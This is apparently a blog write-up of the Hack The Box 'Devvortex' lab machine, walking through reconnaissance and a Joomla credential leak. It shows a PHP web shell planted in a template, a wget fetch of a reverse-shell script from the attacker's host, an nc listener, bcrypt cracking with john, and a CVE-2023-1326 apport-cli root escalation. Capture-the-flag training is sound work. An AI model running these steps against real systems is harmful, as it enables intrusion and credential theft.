Devvortex HTB Writeup
Hello Hackers,
This is my first ever blog though this is not my first ever #hackthebox machine. I had solved 13 boxes on my own when writing this.
And I don’t know why, but I like to solve Linux machines a lot.
So Today I’ll be sharing my experience of the box called #devvortex.
Let’s Get Started …..
After setting up the vpn and ip of the box in /etc/hosts, we’re ready to hack the box.
To add the ip in the /etc/hosts, I use echo command.
sudo sh -c 'echo "10.10.11.242 devvortex.htb" >> /etc/hosts'First ever thing I do while solving the HTB machine is to use nmap to scan the open ports of the box.
sudo nmap -sVCS 10.10.11.242 Starting Nmap 7.93 ( https://nmap.org ) at 2024-04-20 14:12 IST
Nmap scan report for devvortex.htb (10.10.11.242)
Host is up (0.20s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 48add5b83a9fbcbef7e8201ef6bfdeae (RSA)
| 256 b7896c0b20ed49b2c1867c2992741c1f (ECDSA)
|_ 256 18cd9d08a621a8b8b6f79f8d405154fb (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: DevVortex
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.76 secondsThe ssh port was running, and there is port 80 for the webapplication.
There was nothing more intresting in the nmap result, so I thought of finding the subdomains of the target devvortex.htb.
For finding the subdomains of HTB machines, Mostly I use gobuster tool. Using that, I bruteforce the subdomains using some wordlist.
gobuster vhost -u devvortex.htb -w /usr/share/SecLists/Discovery/DNS/subdomains-top1million-5000.txt
After adding the subdomain in the /etc/hosts, we’re ready to see the page.
To add the subdomain in the /etc/hosts, you can use vim and add the subdomain after the devvortex.htb.
It should look something like this:
This was the page.
After exploring the application and seeing the javascripts file, I haven’t found anything. So generally, I bruteforce the paths using dirsearch because after solving so much htb boxes, I noticed that the best crawling tool for HTB is dirsearch.
dirsearch -u http://dev.devvortex.htb/
I found an admin panel path, and noticed that it was using the joomla panel, So I searched it on google.
According to google,
“ Joomla, also styled Joomla! and sometimes abbreviated as J!, is a free and open-source content management system for publishing web content on websites. Web content applications include discussion forums, photo galleries, e-Commerce and user communities, and numerous other web-based applications.”
So I searched for joomla exploit on google and found:
Now, its time to search for the version.
So, I was going through all the files that I had found using dirbuster. There I saw a file named /language/en-GB/langmetadata.xml
http://dev.devvortex.htb/language/en-GB/langmetadata.xml
So I got the version and found that the version was vulnearble to Code Execution and some information disclosure.
So I added the path after my base url and It was:
http://dev.devvortex.htb/api/index.php/v1/config/application?public=true
Now after going to the administrator panel I logged in using the username and password.
So, after logged in. I go to the System> Site Templates
In site template I found there was one template.
After going inside I found bunch of php files.
So after adding system($_GET['cmd’]); inside the error.php file.
I called the file from the url and used the parameter to run the command.
http://dev.devvortex.htb/templates/cassiopeia/error.php?cmd=ls
So I started my python server from the folder that contains the rce.php file. Mostly I use Pentest-Monkey RCE script.
python3 -m http.serverSo, Now its time to wget my rce.php file to the server.
so I used wget -u http://my_ip:8000/rce.php
So the command url I hit was:
http://dev.devvortex.htb/templates/cassiopeia/error.php?cmd=wget -u http://my_ip:8000/rce.phpNow My file was successfully uploaded to the server.
Now I started the nc listener in my machine using:
nc -lvnp 4545 #port number should be same as what you set in the rce.php fileAfter hitting the url of my rce.php file, I got a reverse shell.
To make the shell more interactive I used these commands.
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xtermWhen I get the reverse shell usually I run the script named
linpeas.shin the server that show us all the information of the machine.
So , After running that script on the shell I noticed that the mysql port was running for the localhost. So I immediately run the following command
mysql -u lewis -p #I have used the password that we found.After entering the password that we found, we got acces to the database, after exploring a bit I found the users with the hashed password.
After getting the hashed password, I had used online hash analyzers to know the type of the hash.
https://www.tunnelsup.com/hash-analyzer/
Mostly, I use john tool for cracking passwords, I also like to hashcat. So to crack the bcrypt password I used rockyou.txt file.
So before moving forward, I put both of the hashes in a file called hashes.txt . Then I used the following john command to crack.
john --format=bcrypt --wordlist=/rockyou.txt hashes.txt
Now I signed in using the SSH port with the found passwords and user-email.
ssh logan@devvortex.htb
Then I cat user.txt.
After seeing what the user can run as root using:
sudo -l
We got that user can run apport-cli as a root.
After searching for apport-cli priviledge escalation on Google, we found CVE-2023–1326.
Then I had enter !/bin/bash and then I got the root shell.
Got the root Shell.
This was my first ever blog, I hope you liked that…
